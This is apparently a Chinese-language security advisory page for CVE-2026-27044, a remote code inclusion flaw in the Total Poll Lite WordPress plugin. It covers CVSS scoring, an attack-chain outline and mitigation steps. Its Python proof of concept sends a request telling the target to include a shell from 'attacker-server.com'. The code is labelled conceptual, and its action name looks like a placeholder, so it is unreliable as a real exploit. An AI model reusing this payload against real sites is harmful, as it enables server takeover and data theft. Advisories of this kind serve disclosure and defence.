CVE-2026-27044 CVSS 9.9 严重

CVE-2026-27044 Total Poll Lite远程代码执行漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27044

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Total Poll Lite

漏洞概述

Total Suite开发的Total Poll Lite插件被发现存在严重的代码注入漏洞（CVE-2026-27044）。该漏洞源于对代码生成的不当控制，允许攻击者实现远程代码包含。此漏洞影响4.12.0及以下的所有版本，具有极高的风险。攻击者无需复杂交互，仅需低权限即可通过网络利用该漏洞在服务器上执行任意代码，从而完全接管受影响的WordPress站点。建议用户立即关注官方修复补丁。

技术细节

该漏洞属于代码注入（Code Injection）范畴，具体表现为远程代码包含（RCI）。其根本原因在于Total Poll Lite插件在处理特定用户请求时，未能对输入数据进行严格的校验和过滤，导致攻击者能够操纵服务器端代码的生成逻辑。根据CVSS向量分析，攻击者可以通过网络（AV:N）发起攻击，利用复杂度低（AC:L），且无需用户交互（UI:N）。由于漏洞影响范围可扩展至其他组件（S:C），攻击者只需具备低权限（PR:L）即可触发。利用过程中，攻击者通常会构造包含恶意PHP代码的请求，利用插件中的不安全函数将其包含并执行。成功利用后，攻击者将获得服务器的高权限，不仅能窃取敏感数据库信息（C:H），还能篡改网站数据（I:H）甚至导致服务中断（A:H），对业务造成毁灭性打击。

攻击链分析

STEP 1

侦察

攻击者扫描目标站点，识别是否安装了Total Poll Lite插件及其版本信息。

STEP 2

构造载荷

攻击者根据漏洞细节，构造含有恶意代码或指向恶意文件URL的特定数据包。

STEP 3

发送请求

攻击者向目标WordPress站点的特定端点发送构造好的恶意HTTP请求。

STEP 4

代码执行

服务器端插件解析请求，由于存在代码注入漏洞，恶意代码被包含并执行。

STEP 5

获取权限

攻击者成功在服务器上获得Shell权限，进而控制整个系统或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL structure for WordPress plugin exploitation
# This is a conceptual Proof of Concept for CVE-2026-27044
target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# Malicious payload attempting to inject or include code
# The specific parameter depends on the vulnerable endpoint in totalpoll-lite
payload_data = {
    "action": "totalpoll vulnerable_action", 
    "poll_id": "1",
    "options": "{\"file\":\"http://attacker-server.com/shell.php\"}" 
}

headers = {
    "User-Agent": "CVE-2026-27044-Scanner",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(target_url, data=payload_data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the code was executed/included on the target.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error connecting to target: {e}")

影响范围

Total Poll Lite <= 4.12.0

防御指南

临时缓解措施

由于该漏洞极为严重（CVSS 9.9），建议立即采取行动。首先，应检查当前使用的Total Poll Lite版本，若低于或等于4.12.0，必须立即更新至插件开发者发布的最新安全版本。在未完成更新前，强烈建议在WordPress后台禁用该插件，并限制对wp-admin目录的访问权限。此外，应审查服务器上是否存在未知的可疑文件，确保系统未已被入侵。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表